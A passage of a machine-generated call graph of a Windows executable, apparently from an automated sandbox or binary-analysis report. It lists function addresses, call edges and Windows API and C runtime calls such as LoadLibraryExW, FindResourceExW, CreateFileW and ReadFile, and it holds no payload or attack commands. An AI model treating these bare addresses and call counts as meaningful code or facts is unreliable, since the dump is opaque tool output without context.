6cd4c7 98297->98300 98298->98300 98301 693bb7 98298->98301 98330 693c73 98298->98330 98299 693c7a SetCurrentDirectoryW 98302 693c87 Mailbox 98299->98302 98546 697373 59 API calls Mailbox 98300->98546 98427 6973e5 98301->98427 98302->98212 98305 6cd4d7 98311 6cd4ed SetCurrentDirectoryW 98305->98311 98307 693bd5 GetFullPathNameW 98308 697d2c 59 API calls 98307->98308 98309 693c10 98308->98309 98443 6a0a8d 98309->98443 98311->98302 98313 693c2e 98314 693c38 98313->98314 98547 6f4c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 98313->98547 98459 693a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98314->98459 98317 6cd50a 98317->98314 98320 6cd51b 98317->98320 98322 694864 61 API calls 98320->98322 98324 6cd523 98322->98324 98330->98299 98343->98282 98344->98287 98345->98289 98347 6977c7 59 API calls 98346->98347 98348 69378e 98347->98348 98548 693d43 98348->98548 98350 6937ac 98351 694864 61 API calls 98350->98351 98352 6937c0 98351->98352 98353 697f41 59 API calls 98352->98353 98354 6937cd 98353->98354 98562 694f3d 98354->98562 98357 6cd3ae 98629 6f97e5 98357->98629 98358 6937ee Mailbox 98362 6981a7 59 API calls 98358->98362 98361 6cd3cd 98364 6b2f95 _free 58 API calls 98361->98364 98365 693801 98362->98365 98366 6cd3da 98364->98366 98586 6993ea 98365->98586 98368 694faa 84 API calls 98366->98368 98371 6cd3e3 98368->98371 98370 697f41 59 API calls 98372 69381a 98370->98372 98374 693ee2 59 API calls 98371->98374 98589 698620 98372->98589 98376 6cd3fe 98374->98376 98375 69382c Mailbox 98377 697f41 59 API calls 98375->98377 98378 693ee2 59 API calls 98376->98378 98379 693852 98377->98379 98380 6cd41a 98378->98380 98381 698620 69 API calls 98379->98381 98382 694864 61 API calls 98380->98382 98384 693861 Mailbox 98381->98384 98383 6cd43f 98382->98383 98385 693ee2 59 API calls 98383->98385 98387 6977c7 59 API calls 98384->98387 98386 6cd44b 98385->98386 98388 6981a7 59 API calls 98386->98388 98389 69387f 98387->98389 98391 6cd459 98388->98391 98593 693ee2 98389->98593 98392 693ee2 59 API calls 98391->98392 98394 6cd468 98392->98394 98400 6981a7 59 API calls 98394->98400 98396 693899 98396->98371 98397 6938a3 98396->98397 98398 6b313d _W_store_winword 60 API calls 98397->98398 98399 6938ae 98398->98399 98399->98376 98401 6938b8 98399->98401 98402 6cd48a 98400->98402 98403 6b313d _W_store_winword 60 API calls 98401->98403 98404 693ee2 59 API calls 98402->98404 98405 6938c3 98403->98405 98406 6cd497 98404->98406 98405->98380 98407 6938cd 98405->98407 98406->98406 98408 6b313d _W_store_winword 60 API calls 98407->98408 98409 6938d8 98408->98409 98409->98394 98410 693919 98409->98410 98412 693ee2 59 API calls 98409->98412 98410->98394 98411 693926 98410->98411 98609 69942e 98411->98609 98413 6938fc 98412->98413 98415 6981a7 59 API calls 98413->98415 98417 69390a 98415->98417 98419 693ee2 59 API calls 98417->98419 98419->98410 98422 6993ea 59 API calls 98424 693961 98422->98424 98423 699040 60 API calls 98423->98424 98424->98422 98424->98423 98425 693ee2 59 API calls 98424->98425 98426 6939a7 Mailbox 98424->98426 98425->98424 98426->98296 98428 6973f2 __ftell_nolock 98427->98428 98429 69740b 98428->98429 98430 6cee4b _memset 98428->98430 98431 6948ae 60 API calls 98429->98431 98432 6cee67 GetOpenFileNameW 98430->98432 98433 697414 98431->98433 98434 6ceeb6 98432->98434 99415 6b09d5 98433->99415 98436 697d2c 59 API calls 98434->98436 98438 6ceecb 98436->98438 98438->98438 98440 697429 99433 6969ca 98440->99433 98444 6a0a9a __ftell_nolock 98443->98444 99728 696ee0 98444->99728 98446 6a0a9f 98448 693c26 98446->98448 99739 6a12fe 89 API calls 98446->99739 98448->98305 98448->98313 98449 6a0aac 98449->98448 99740 6a4047 91 API calls Mailbox 98449->99740 98451 6a0ab5 98451->98448 98452 6a0ab9 GetFullPathNameW 98451->98452 98453 697d2c 59 API calls 98452->98453 98454 6a0ae5 98453->98454 98460 6cd49c 98459->98460 98461 693ac2 LoadImageW RegisterClassExW 98459->98461 99779 6948fe LoadImageW EnumResourceNamesW 98460->99779 99778 693041 7 API calls 98461->99778 98464 693b46 98466 6939e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98464->98466 98465 6cd4a5 98546->98305 98547->98317 98549 693d50 __ftell_nolock 98548->98549 98550 697d2c 59 API calls 98549->98550 98555 693eb6 Mailbox 98549->98555 98552 693d82 98550->98552 98560 693db8 Mailbox 98552->98560 98670 697b52 98552->98670 98553 697b52 59 API calls 98553->98560 98554 693e89 98554->98555 98556 697f41 59 API calls 98554->98556 98555->98350 98558 693eaa 98556->98558 98557 697f41 59 API calls 98557->98560 98559 693f84 59 API calls 98558->98559 98559->98555 98560->98553 98560->98554 98560->98555 98560->98557 98561 693f84 59 API calls 98560->98561 98561->98560 98673 694d13 98562->98673 98567 694f68 LoadLibraryExW 98683 694cc8 98567->98683 98568 6cdd0f 98570 694faa 84 API calls 98568->98570 98572 6cdd16 98570->98572 98574 694cc8 3 API calls 98572->98574 98576 6cdd1e 98574->98576 98575 694f8f 98575->98576 98577 694f9b 98575->98577 98709 69506b 98576->98709 98578 694faa 84 API calls 98577->98578 98580 6937e6 98578->98580 98580->98357 98580->98358 98583 6cdd45 98717 695027 98583->98717 98585 6cdd52 98587 6b0ff6 Mailbox 59 API calls 98586->98587 98588 69380d 98587->98588 98588->98370 98590 69862b 98589->98590 98592 698652 98590->98592 99144 698b13 69 API calls Mailbox 98590->99144 98592->98375 98594 693eec 98593->98594 98595 693f05 98593->98595 98596 6981a7 59 API calls 98594->98596 98597 697d2c 59 API calls 98595->98597 98598 69388b 98596->98598 98597->98598 98599 6b313d 98598->98599 98600 6b3149 98599->98600 98601 6b31be 98599->98601 98608 6b316e 98600->98608 99145 6b8d68 58 API calls __getptd_noexit 98600->99145 99147 6b31d0 60 API calls 3 library calls 98601->99147 98604 6b31cb 98604->98396 98605 6b3155 99146 6b8ff6 9 API calls __ftell_nolock 98605->99146 98607 6b3160 98607->98396 98608->98396 98610 699436 98609->98610 98611 6b0ff6 Mailbox 59 API calls 98610->98611 98612 699444 98611->98612 98614 693936 98612->98614 99148 69935c 59 API calls Mailbox 98612->99148 98615 6991b0 98614->98615 99149 6992c0 98615->99149 98617 6b0ff6 Mailbox 59 API calls 98619 693944 98617->98619 98618 6991bf 98618->98617 98618->98619 98620 699040 98619->98620 98621 6cf5a5 98620->98621 98623 699057 98620->98623 98621->98623 99164 698d3b 59 API calls Mailbox 98621->99164 98624 69915f 98623->98624 98625 699158 98623->98625 98626 6991a0 98623->98626 98624->98424 98628 6b0ff6 Mailbox 59 API calls 98625->98628 99163 699e9c 60 API calls Mailbox 98626->99163 98628->98624 98630 695045 85 API calls 98629->98630 98631 6f9854 98630->98631 99165 6f99be 98631->99165 98634 69506b 74 API calls 98635 6f9881 98634->98635 98636 69506b 74 API calls 98635->98636 98637 6f9891 98636->98637 98638 69506b 74 API calls 98637->98638 98639 6f98ac 98638->98639 98640 69506b 74 API calls 98639->98640 98641 6f98c7 98640->98641 98642 695045 85 API calls 98641->98642 98643 6f98de 98642->98643 98644 6b594c _W_store_winword 58 API calls 98643->98644 98645 6f98e5 98644->98645 98646 6b594c _W_store_winword 58 API calls 98645->98646 98647 6f98ef 98646->98647 98648 69506b 74 API calls 98647->98648 98649 6f9903 98648->98649 98650 6f9393 GetSystemTimeAsFileTime 98649->98650 98651 6f9916 98650->98651 98652 6f992b 98651->98652 98653 6f9940 98651->98653 98654 6b2f95 _free 58 API calls 98652->98654 98655 6f9946 98653->98655 98656 6f99a5 98653->98656 98658 6f9931 98654->98658 99171 6f8d90 98655->99171 98657 6b2f95 _free 58 API calls 98656->98657 98662 6cd3c1 98657->98662 98660 6b2f95 _free 58 API calls 98658->98660 98660->98662 98662->98361 98664 694faa 98662->98664 98663 6b2f95 _free 58 API calls 98663->98662 98665 694fb4 98664->98665 98667 694fbb 98664->98667 98666 6b55d6 __fcloseall 83 API calls 98665->98666 98666->98667 98668 694fdb FreeLibrary 98667->98668 98669 694fca 98667->98669 98668->98669 98669->98361 98671 697faf 59 API calls 98670->98671 98672 697b5d 98671->98672 98672->98552 98722 694d61 98673->98722 98676 694d4a FreeLibrary 98677 694d53 98676->98677 98680 6b548b 98677->98680 98678 694d61 2 API calls 98679 694d3a 98678->98679 98679->98676 98679->98677 98726 6b54a0 98680->98726 98682 694f5c 98682->98567 98682->98568 98884 694d94 98683->98884 98686 694d94 2 API calls 98689 694ced 98686->98689 98687 694d08 98690 694dd0 98687->98690 98688 694cff FreeLibrary 98688->98687 98689->98687 98689->98688 98691 6b0ff6 Mailbox 59 API calls 98690->98691 98692 694de5 98691->98692 98693 69538e 59 API calls 98692->98693 98694 694df1 _memmove 98693->98694 98695 694e2c 98694->98695 98696 694ee9 98694->98696 98697 694f21 98694->98697 98698 695027 69 API calls 98695->98698 98888 694fe9 CreateStreamOnHGlobal 98696->98888 98899 6f9ba5 95 API calls 98697->98899 98704 694e35 98698->98704 98701 69506b 74 API calls 98701->98704 98702 694ec9 98702->98575 98704->98701 98704->98702 98705 6cdcd0 98704->98705 98894 695045 98704->98894 98706 695045 85 API calls 98705->98706 98707 6cdce4 98706->98707 98708 69506b 74 API calls 98707->98708 98708->98702 98710 69507d 98709->98710 98711 6cddf6 98709->98711 98923 6b5812 98710->98923 98714 6f9393 99121 6f91e9 98714->99121 98716 6f93a9 98716->98583 98718 6cddb9 98717->98718 98719 695036 98717->98719 99126 6b5e90 98719->99126 98721 69503e 98721->98585 98723 694d2e 98722->98723 98724 694d6a LoadLibraryA 98722->98724 98723->98678 98723->98679 98724->98723 98725 694d7b GetProcAddress 98724->98725 98725->98723 98728 6b54ac __tzset_nolock 98726->98728 98727 6b54bf 98775 6b8d68 58 API calls __getptd_noexit 98727->98775 98728->98727 98731 6b54f0 98728->98731 98730 6b54c4 98776 6b8ff6 9 API calls __ftell_nolock 98730->98776 98745 6c0738 98731->98745 98734 6b54f5 98735 6b550b 98734->98735 98736 6b54fe 98734->98736 98738 6b5535 98735->98738 98739 6b5515 98735->98739 98777 6b8d68 58 API calls __getptd_noexit 98736->98777 98760 6c0857 98738->98760 98778 6b8d68 58 API calls __getptd_noexit 98739->98778 98743 6b54cf __tzset_nolock @_EH4_CallFilterFunc@8 98743->98682 98746 6c0744 __tzset_nolock 98745->98746 98747 6b9e4b __lock 58 API calls 98746->98747 98758 6c0752 98747->98758 98748 6c07c6 98780 6c084e 98748->98780 98749 6c07cd 98785 6b8a5d 58 API calls 2 library calls 98749->98785 98752 6c0843 __tzset_nolock 98752->98734 98753 6c07d4 98753->98748 98786 6ba06b InitializeCriticalSectionAndSpinCount 98753->98786 98754 6b9ed3 __mtinitlocknum 58 API calls 98754->98758 98757 6c07fa EnterCriticalSection 98757->98748 98758->98748 98758->98749 98758->98754 98783 6b6e8d 59 API calls __lock 98758->98783 98784 6b6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98758->98784 98761 6c0877 __wopenfile 98760->98761 98762 6c0891 98761->98762 98774 6c0a4c 98761->98774 98793 6b3a0b 60 API calls 2 library calls 98761->98793 98791 6b8d68 58 API calls __getptd_noexit 98762->98791 98764 6c0896 98792 6b8ff6 9 API calls __ftell_nolock 98764->98792 98766 6b5540 98779 6b5562 LeaveCriticalSection LeaveCriticalSection __wfsopen 98766->98779 98767 6c0aaf 98788 6c87f1 98767->98788 98770 6c0a45 98770->98774 98794 6b3a0b 60 API calls 2 library calls 98770->98794 98772 6c0a64 98772->98774 98795 6b3a0b 60 API calls 2 library calls 98772->98795 98774->98762 98774->98767 98775->98730 98776->98743 98777->98743 98778->98743 98779->98743 98787 6b9fb5 LeaveCriticalSection 98780->98787 98782 6c0855 98782->98752 98783->98758 98784->98758 98785->98753 98786->98757 98787->98782 98796 6c7fd5 98788->98796 98790 6c880a 98790->98766 98791->98764 98792->98766 98793->98770 98794->98772 98795->98774 98799 6c7fe1 __tzset_nolock 98796->98799 98797 6c7ff7 98881 6b8d68 58 API calls __getptd_noexit 98797->98881 98799->98797 98801 6c802d 98799->98801 98800 6c7ffc 98882 6b8ff6 9 API calls __ftell_nolock 98800->98882 98807 6c809e 98801->98807 98804 6c8049 98883 6c8072 LeaveCriticalSection __unlock_fhandle 98804->98883 98806 6c8006 __tzset_nolock 98806->98790 98808 6c80be 98807->98808 98809 6b471a __wsopen_nolock 58 API calls 98808->98809 98812 6c80da 98809->98812 98810 6b9006 __invoke_watson 8 API calls 98811 6c87f0 98810->98811 98814 6c7fd5 __wsopen_helper 103 API calls 98811->98814 98813 6c8114 98812->98813 98820 6c8137 98812->98820 98856 6c8211 98812->98856 98815 6b8d34 __wsopen_nolock 58 API calls 98813->98815 98816 6c880a 98814->98816 98817 6c8119 98815->98817 98816->98804 98818 6b8d68 __ftell_nolock 58 API calls 98817->98818 98819 6c8126 98818->98819 98822 6b8ff6 __ftell_nolock 9 API calls 98819->98822 98821 6c81f5 98820->98821 98828 6c81d3 98820->98828 98823 6b8d34 __wsopen_nolock 58 API calls 98821->98823 98849 6c8130 98822->98849 98824 6c81fa 98823->98824 98825 6b8d68 __ftell_nolock 58 API calls 98824->98825 98826 6c8207 98825->98826 98827 6b8ff6 __ftell_nolock 9 API calls 98826->98827 98827->98856 98829 6bd4d4 __alloc_osfhnd 61 API calls 98828->98829 98830 6c82a1 98829->98830 98831 6c82ce 98830->98831 98832 6c82ab 98830->98832 98833 6c7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98831->98833 98834 6b8d34 __wsopen_nolock 58 API calls 98832->98834 98842 6c82f0 98833->98842 98835 6c82b0 98834->98835 98837 6b8d68 __ftell_nolock 58 API calls 98835->98837 98836 6c836e GetFileType 98840 6c8379 GetLastError 98836->98840 98841 6c83bb 98836->98841 98839 6c82ba 98837->98839 98838 6c833c GetLastError 98843 6b8d47 __dosmaperr 58 API calls 98838->98843 98844 6b8d68 __ftell_nolock 58 API calls 98839->98844 98845 6b8d47 __dosmaperr 58 API calls 98840->98845 98852 6bd76a __set_osfhnd 59 API calls 98841->98852 98842->98836 98842->98838 98847 6c7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98842->98847 98848 6c8361 98843->98848 98844->98849 98846 6c83a0 CloseHandle 98845->98846 98846->98848 98850 6c83ae 98846->98850 98851 6c8331 98847->98851 98854 6b8d68 __ftell_nolock 58 API calls 98848->98854 98849->98804 98853 6b8d68 __ftell_nolock 58 API calls 98850->98853 98851->98836 98851->98838 98858 6c83d9 98852->98858 98855 6c83b3 98853->98855 98854->98856 98855->98848 98856->98810 98857 6c8594 98857->98856 98860 6c8767 CloseHandle 98857->98860 98858->98857 98859 6c1b11 __lseeki64_nolock 60 API calls 98858->98859 98869 6c845a 98858->98869 98861 6c8443 98859->98861 98862 6c7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98860->98862 98863 6b8d34 __wsopen_nolock 58 API calls 98861->98863 98861->98869 98865 6c878e 98862->98865 98863->98869 98864 6c10ab 70 API calls __read_nolock 98864->98869 98866 6c87c2 98865->98866 98867 6c8796 GetLastError 98865->98867 98866->98856 98868 6b8d47 __dosmaperr 58 API calls 98867->98868 98870 6c87a2 98868->98870 98869->98857 98869->98864 98871 6c0d2d __close_nolock 61 API calls 98869->98871 98872 6c848c 98869->98872 98875 6bdac6 __write 78 API calls 98869->98875 98876 6c8611 98869->98876 98877 6c1b11 60 API calls __lseeki64_nolock 98869->98877 98873 6bd67d __free_osfhnd 59 API calls 98870->98873 98871->98869 98872->98869 98874 6c99f2 __chsize_nolock 82 API calls 98872->98874 98873->98866 98874->98872 98875->98869 98878 6c0d2d __close_nolock 61 API calls 98876->98878 98877->98869 98879 6c8618 98878->98879 98880 6b8d68 __ftell_nolock 58 API calls 98879->98880 98880->98856 98881->98800 98882->98806 98883->98806 98885 694ce1 98884->98885 98886 694d9d LoadLibraryA 98884->98886 98885->98686 98885->98689 98886->98885 98887 694dae GetProcAddress 98886->98887 98887->98885 98889 695020 98888->98889 98890 695003 FindResourceExW 98888->98890 98889->98695 98890->98889 98891 6cdd5c LoadResource 98890->98891 98891->98889 98892 6cdd71 SizeofResource 98891->98892 98892->98889 98893 6cdd85 LockResource 98892->98893 98893->98889 98895 6cddd4 98894->98895 98896 695054 98894->98896 98900 6b5a7d 98896->98900 98898 695062 98898->98704 98899->98695 98902 6b5a89 __tzset_nolock 98900->98902 98901 6b5a9b 98913 6b8d68 58 API calls __getptd_noexit 98901->98913 98902->98901 98903 6b5ac1 98902->98903 98915 6b6e4e 98903->98915 98906 6b5aa0 98914 6b8ff6 9 API calls __ftell_nolock 98906->98914 98907 6b5ac7 98921 6b59ee 83 API calls 3 library calls 98907->98921 98910 6b5ad6 98922 6b5af8 LeaveCriticalSection LeaveCriticalSection __wfsopen 98910->98922 98912 6b5aab __tzset_nolock 98912->98898 98913->98906 98914->98912 98916 6b6e5e 98915->98916 98917 6b6e80 EnterCriticalSection 98915->98917 98916->98917 98918 6b6e66 98916->98918 98919 6b6e76 98917->98919 98920 6b9e4b __lock 58 API calls 98918->98920 98919->98907 98920->98919 98921->98910 98922->98912 98926 6b582d 98923->98926 98925 69508e 98925->98714 98927 6b5839 __tzset_nolock 98926->98927 98928 6b584f _memset 98927->98928 98929 6b587c 98927->98929 98930 6b5874 __tzset_nolock 98927->98930 98953 6b8d68 58 API calls __getptd_noexit 98928->98953 98931 6b6e4e __lock_file 59 API calls 98929->98931 98930->98925 98932 6b5882 98931->98932 98939 6b564d 98932->98939 98935 6b5869 98954 6b8ff6 9 API calls __ftell_nolock 98935->98954 98943 6b5668 _memset 98939->98943 98952 6b5683 98939->98952 98940 6b5673 99051 6b8d68 58 API calls __getptd_noexit 98940->99051 98942 6b5678 99052 6b8ff6 9 API calls __ftell_nolock 98942->99052 98943->98940 98950 6b56c3 98943->98950 98943->98952 98946 6b57d4 _memset 99054 6b8d68 58 API calls __getptd_noexit 98946->99054 98950->98946 98950->98952 98956 6b4916 98950->98956 98963 6c10ab 98950->98963 99031 6c0df7 98950->99031 99053 6c0f18 58 API calls 3 library calls 98950->99053 98955 6b58b6 LeaveCriticalSection LeaveCriticalSection __wfsopen 98952->98955 98953->98935 98954->98930 98955->98930 98957 6b4920 98956->98957 98958 6b4935 98956->98958 99055 6b8d68 58 API calls __getptd_noexit 98957->99055 98958->98950 98960 6b4925 99056 6b8ff6 9 API calls __ftell_nolock 98960->99056 98962 6b4930 98962->98950 98964 6c10cc 98963->98964 98965 6c10e3 98963->98965 99066 6b8d34 58 API calls __getptd_noexit 98964->99066 98967 6c181b 98965->98967 98972 6c111d 98965->98972 99082 6b8d34 58 API calls __getptd_noexit 98967->99082 98969 6c10d1 99067 6b8d68 58 API calls __getptd_noexit 98969->99067 98970 6c1820 99083 6b8d68 58 API calls __getptd_noexit 98970->99083 98974 6c1125 98972->98974 98979 6c113c 98972->98979 99068 6b8d34 58 API calls __getptd_noexit 98974->99068 98975 6c1131 99084 6b8ff6 9 API calls __ftell_nolock 98975->99084 98977 6c112a 99069 6b8d68 58 API calls __getptd_noexit 98977->99069 98980 6c1151 98979->98980 98983 6c116b 98979->98983 98984 6c1189 98979->98984 99011 6c10d8 98979->99011 99070 6b8d34 58 API calls __getptd_noexit 98980->99070 98983->98980 98988 6c1176 98983->98988 99071 6b8a5d 58 API calls 2 library calls 98984->99071 98986 6c1199 98989 6c11bc 98986->98989 98990 6c11a1 98986->98990 99057 6c5ebb 98988->99057 99074 6c1b11 60 API calls 3 library calls 98989->99074 99072 6b8d68 58 API calls __getptd_noexit 98990->99072 98991 6c128a 98993 6c1303 ReadFile 98991->98993 98998 6c12a0 GetConsoleMode 98991->98998 98996 6c1325 98993->98996 98997 6c17e3 GetLastError 98993->98997 98995 6c11a6 99073 6b8d34 58 API calls __getptd_noexit 98995->99073 98996->98997 99004 6c12f5 98996->99004 99000 6c12e3 98997->99000 99001 6c17f0 98997->99001 99002 6c12b4 98998->99002 99003 6c1300 98998->99003 99014 6c12e9 99000->99014 99075 6b8d47 58 API calls 3 library calls 99000->99075 99080 6b8d68 58 API calls __getptd_noexit 99001->99080 99002->99003 99006 6c12ba ReadConsoleW 99002->99006 99003->98993 99013 6c15c7 99004->99013 99004->99014 99016 6c135a 99004->99016 99006->99004 99009 6c12dd GetLastError 99006->99009 99008 6c17f5 99081 6b8d34 58 API calls __getptd_noexit 99008->99081 99009->99000 99011->98950 99012 6b2f95 _free 58 API calls 99012->99011 99013->99014 99018 6c16cd ReadFile 99013->99018 99014->99011 99014->99012 99017 6c13c6 ReadFile 99016->99017 99023 6c1447 99016->99023 99019 6c13e7 GetLastError 99017->99019 99028 6c13f1 99017->99028 99022 6c16f0 GetLastError 99018->99022 99030 6c16fe 99018->99030 99019->99028 99020 6c1504 99025 6c14b4 MultiByteToWideChar 99020->99025 99078 6c1b11 60 API calls 3 library calls 99020->99078 99021 6c14f4 99077 6b8d68 58 API calls __getptd_noexit 99021->99077 99022->99030 99023->99014 99023->99020 99023->99021 99023->99025 99025->99009 99025->99014 99028->99016 99076 6c1b11 60 API calls 3 library calls 99028->99076 99030->99013 99079 6c1b11 60 API calls 3 library calls 99030->99079 99032 6c0e02 99031->99032 99036 6c0e17 99031->99036 99118 6b8d68 58 API calls __getptd_noexit 99032->99118 99034 6c0e07 99119 6b8ff6 9 API calls __ftell_nolock 99034->99119 99037 6c0e4c 99036->99037 99043 6c0e12 99036->99043 99120 6c6234 58 API calls __malloc_crt 99036->99120 99039 6b4916 __ftell_nolock 58 API calls 99037->99039 99040 6c0e60 99039->99040 99085 6c0f97 99040->99085 99042 6c0e67 99042->99043 99044 6b4916 __ftell_nolock 58 API calls 99042->99044 99043->98950 99045 6c0e8a 99044->99045 99045->99043 99046 6b4916 __ftell_nolock 58 API calls 99045->99046 99047 6c0e96 99046->99047 99047->99043 99048 6b4916 __ftell_nolock 58 API calls 99047->99048 99049 6c0ea3 99048->99049 99050 6b4916 __ftell_nolock 58 API calls 99049->99050 99050->99043 99051->98942 99052->98952 99053->98950 99054->98942 99055->98960 99056->98962 99058 6c5ec6 99057->99058 99059 6c5ed3 99057->99059 99060 6b8d68 __ftell_nolock 58 API calls 99058->99060 99062 6c5edf 99059->99062 99063 6b8d68 __ftell_nolock 58 API calls 99059->99063 99061 6c5ecb 99060->99061 99061->98991 99062->98991 99064 6c5f00 99063->99064 99065 6b8ff6 __ftell_nolock 9 API calls 99064->99065 99065->99061 99066->98969 99067->99011 99068->98977 99069->98975 99070->98977 99071->98986 99072->98995 99073->99011 99074->98988 99075->99014 99076->99028 99077->99014 99078->99025 99079->99030 99080->99008 99081->99014 99082->98970 99083->98975 99084->99011 99086 6c0fa3 __tzset_nolock 99085->99086 99087 6c0fc7 99086->99087 99088 6c0fb0 99086->99088 99089 6c108b 99087->99089 99092 6c0fdb 99087->99092 99090 6b8d34 __wsopen_nolock 58 API calls 99088->99090 99093 6b8d34 __wsopen_nolock 58 API calls 99089->99093 99091 6c0fb5 99090->99091 99094 6b8d68 __ftell_nolock 58 API calls 99091->99094 99095 6c0ff9 99092->99095 99096 6c1006 99092->99096 99102 6c0ffe 99093->99102 99113 6c0fbc __tzset_nolock 99094->99113 99097 6b8d34 __wsopen_nolock 58 API calls 99095->99097 99098 6c1028 99096->99098 99099 6c1013 99096->99099 99097->99102 99100 6bd446 ___lock_fhandle 59 API calls 99098->99100 99103 6b8d34 __wsopen_nolock 58 API calls 99099->99103 99104 6c102e 99100->99104 99101 6b8d68 __ftell_nolock 58 API calls 99105 6c1020 99101->99105 99102->99101 99106 6c1018 99103->99106 99107 6c1054 99104->99107 99108 6c1041 99104->99108 99111 6b8ff6 __ftell_nolock 9 API calls 99105->99111 99109 6b8d68 __ftell_nolock 58 API calls 99106->99109 99112 6b8d68 __ftell_nolock 58 API calls 99107->99112 99110 6c10ab __read_nolock 70 API calls 99108->99110 99109->99105 99114 6c104d 99110->99114 99111->99113 99115 6c1059 99112->99115 99113->99042 99117 6c1083 __read LeaveCriticalSection 99114->99117 99116 6b8d34 __wsopen_nolock 58 API calls 99115->99116 99116->99114 99117->99113 99118->99034 99119->99043 99120->99037 99124 6b543a GetSystemTimeAsFileTime 99121->99124 99123 6f91f8 99123->98716 99125 6b5468 __aulldiv 99124->99125 99125->99123 99127 6b5e9c __tzset_nolock 99126->99127 99128 6b5eae 99127->99128 99129 6b5ec3 99127->99129 99140 6b8d68 58 API calls __getptd_noexit 99128->99140 99130 6b6e4e __lock_file 59 API calls 99129->99130 99133 6b5ec9 99130->99133 99132 6b5eb3 99141 6b8ff6 9 API calls __ftell_nolock 99132->99141 99142 6b5b00 67 API calls 3 library calls 99133->99142 99136 6b5ed4 99143 6b5ef4 LeaveCriticalSection LeaveCriticalSection __wfsopen 99136->99143 99138 6b5ee6 99139 6b5ebe __tzset_nolock 99138->99139 99139->98721 99140->99132 99141->99139 99142->99136 99143->99138 99144->98592 99145->98605 99146->98607 99147->98604 99148->98614 99150 6992c9 Mailbox 99149->99150 99151 6cf5c8 99150->99151 99156 6992d3 99150->99156 99152 6b0ff6 Mailbox 59 API calls 99151->99152 99154 6cf5d4 99152->99154 99153 6992da 99153->98618 99154->99154 99156->99153 99157 699df0 99156->99157 99159 699dfb 99157->99159 99158 699e32 99158->99156 99159->99158 99162 698e34 59 API calls Mailbox 99159->99162 99161 699e5d 99161->99156 99162->99161 99163->98624 99164->98623 99169 6f99d2 __tzset_nolock _wcscmp 99165->99169 99166 6f9866 99166->98634 99166->98662 99167 69506b 74 API calls 99167->99169 99168 6f9393 GetSystemTimeAsFileTime 99168->99169 99169->99166 99169->99167 99169->99168 99170 695045 85 API calls 99169->99170 99170->99169 99172 6f8d9b 99171->99172 99173 6f8da9 99171->99173 99174 6b548b 115 API calls 99172->99174 99175 6f8dee 99173->99175 99176 6b548b 115 API calls 99173->99176 99198 6f8db2 99173->99198 99174->99173 99202 6f901b 99175->99202 99178 6f8dd3 99176->99178 99178->99175 99180 6f8ddc 99178->99180 99179 6f8e32 99181 6f8e57 99179->99181 99182 6f8e36 99179->99182 99183 6b55d6 __fcloseall 83 API calls 99180->99183 99180->99198 99206 6f8c33 99181->99206 99185 6f8e43 99182->99185 99187 6b55d6 __fcloseall 83 API calls 99182->99187 99183->99198 99190 6b55d6 __fcloseall 83 API calls 99185->99190 99185->99198 99187->99185 99188 6f8e85 99215 6f8eb5 99188->99215 99189 6f8e65 99191 6f8e72 99189->99191 99193 6b55d6 __fcloseall 83 API calls 99189->99193 99190->99198 99196 6b55d6 __fcloseall 83 API calls 99191->99196 99191->99198 99193->99191 99196->99198 99198->98663 99199 6f8ea0 99199->99198 99201 6b55d6 __fcloseall 83 API calls 99199->99201 99201->99198 99203 6f9040 99202->99203 99205 6f9029 __tzset_nolock _memmove 99202->99205 99204 6b5812 __fread_nolock 74 API calls 99203->99204 99204->99205 99205->99179 99207 6b594c _W_store_winword 58 API calls 99206->99207 99208 6f8c42 99207->99208 99209 6b594c _W_store_winword 58 API calls 99208->99209 99210 6f8c56 99209->99210 99211 6b594c _W_store_winword 58 API calls 99210->99211 99212 6f8c6a 99211->99212 99213 6f8f97 58 API calls 99212->99213 99214 6f8c7d 99212->99214 99213->99214 99214->99188 99214->99189 99222 6f8eca 99215->99222 99216 6f8f82 99244 6f91bf 99216->99244 99218 6f8e8c 99223 6f8f97 99218->99223 99219 6f8c8f 74 API calls 99219->99222 99222->99216 99222->99218 99222->99219 99248 6f8d2b 74 API calls 99222->99248 99249 6f909c 80 API calls 99222->99249 99224 6f8faa 99223->99224 99225 6f8fa4 99223->99225 99227 6f8fbb 99224->99227 99228 6b2f95 _free 58 API calls 99224->99228 99226 6b2f95 _free 58 API calls 99225->99226 99226->99224 99229 6f8e93 99227->99229 99230 6b2f95 _free 58 API calls 99227->99230 99228->99227 99229->99199 99231 6b55d6 99229->99231 99230->99229 99232 6b55e2 __tzset_nolock 99231->99232 99233 6b560e 99232->99233 99234 6b55f6 99232->99234 99237 6b6e4e __lock_file 59 API calls 99233->99237 99240 6b5606 __tzset_nolock 99233->99240 99331 6b8d68 58 API calls __getptd_noexit 99234->99331 99236 6b55fb 99332 6b8ff6 9 API calls __ftell_nolock 99236->99332 99239 6b5620 99237->99239 99315 6b556a 99239->99315 99240->99199 99245 6f91cc 99244->99245 99246 6f91dd 99244->99246 99250 6b4a93 99245->99250 99246->99218 99248->99222 99249->99222 99251 6b4a9f __tzset_nolock 99250->99251 99252 6b4abd 99251->99252 99253 6b4ad5 99251->99253 99256 6b4acd __tzset_nolock 99251->99256 99275 6b8d68 58 API calls __getptd_noexit 99252->99275 99254 6b6e4e __lock_file 59 API calls 99253->99254 99257 6b4adb 99254->99257 99256->99246 99263 6b493a 99257->99263 99258 6b4ac2 99276 6b8ff6 9 API calls __ftell_nolock 99258->99276 99264 6b4949 99263->99264 99270 6b4967 99263->99270 99265 6b4957 99264->99265 99264->99270 99273 6b4981 _memmove 99264->99273 99306 6b8d68 58 API calls __getptd_noexit 99265->99306 99267 6b495c 99307 6b8ff6 9 API calls __ftell_nolock 99267->99307 99277 6b4b0d LeaveCriticalSection LeaveCriticalSection __wfsopen 99270->99277 99272 6b4916 __ftell_nolock 58 API calls 99272->99273 99273->99270 99273->99272 99278 6bdac6 99273->99278 99308 6b4c6d 99273->99308 99314 6bb05e 78 API calls 5 library calls 99273->99314 99275->99258 99276->99256 99277->99256 99279 6bdad2 __tzset_nolock 99278->99279 99280 6bdadf 99279->99280 99281 6bdaf6 99279->99281 99282 6b8d34 __wsopen_nolock 58 API calls 99280->99282 99283 6bdb95 99281->99283 99285 6bdb0a 99281->99285 99284 6bdae4 99282->99284 99286 